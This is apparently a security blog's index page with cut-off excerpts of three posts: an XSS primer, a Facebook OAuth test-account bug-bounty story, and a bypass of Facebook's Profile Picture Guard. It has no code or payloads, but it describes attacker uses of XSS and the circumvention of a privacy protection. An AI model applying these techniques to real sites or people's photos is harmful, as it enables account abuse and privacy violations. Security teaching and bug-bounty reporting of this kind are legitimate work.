Posts

Introduction to XSS - Methods, Impact and Prevention

Image
When searching for hacking tutorials or reading through write ups, definitely you will come across the term XSS. In this post, I am going to explain what is XSS, what are it's impacts and how to achieve it with few examples. XSS aka Cross Site Scripting is a vulnerability which allow the attacker to inject and execute JavaScript code on the target website. This allow attacker to log the victim details, make a phishing page, bypass csrf, get cookies and many more. XSS is of 2 types. Stored and Reflected. Stored XSS is the type of XSS when the user entered data is stored in the server and the displayed in any other page. For example parameters like name, place, about etc can be vulnerable to stored XSS. That said, fields like password are stored once and never retrieved or showed in future, hence it is not vulnerable to stored XSS. When this can be exploited? The developer isn't validating user inputs. The developer added certain validations but they are client side

Bug in Facebook OAuth. Convert facebook test account to real account in instagram/ oculus

Image
Facebook Provide you the ability to create test accounts for white hat testing. You can create it by visiting the url  facebook.com/whitehat/accounts . Facebook wants you to test for security issues using test accounts only and if you're unable to reproduce an issue with a test account, then it is okay to use a real account you own or you have to get permission from the account owner. Adding Facebook implemented certain limitations for the test accounts. I stuck with the last one. Can't convert to a real user account. Ok let's try it. I tried for about a day in different ways like using the fake email at account recovery system and so on but failed. I was like And then I thought that I might find a way abusing facebook oauth system with test accounts. Navigated to few sites which allows login with facebook. But when I tried login with facebook, It shows an error. Oops!! again screwed. Then I decided to stop there and went to bed because it was 3 AM at night.

Download Guarded Profile Picture From Facebook

Image
Facebook recently introduced a feature called Profile Picture Guard. It protect others from downloading your profile picture. If you want to know more about it, you can read it here  Profile Picture Guard | Facebook Help . When turning on Profile Picture Guard, Facebook assure you that no one else can download your profile picture. Really??? 😆😆😆 Never!!! I worked some time on it to see how can I bypass this restriction. Tried calculating the url to cdn but it requires a signature to access the file. Tried to view image and change dimensions and the result is negative. What's next? Think out of the Box. I think I should leave it and change my target first. Then I decided to test it from my another account to check is there a way to bypass it. Opened the profile picture and copied the url. Then I opened incognito to login to other account. Went to the url that I copied earlier and I was about to type my username and password in the login form at the top of page. Sudd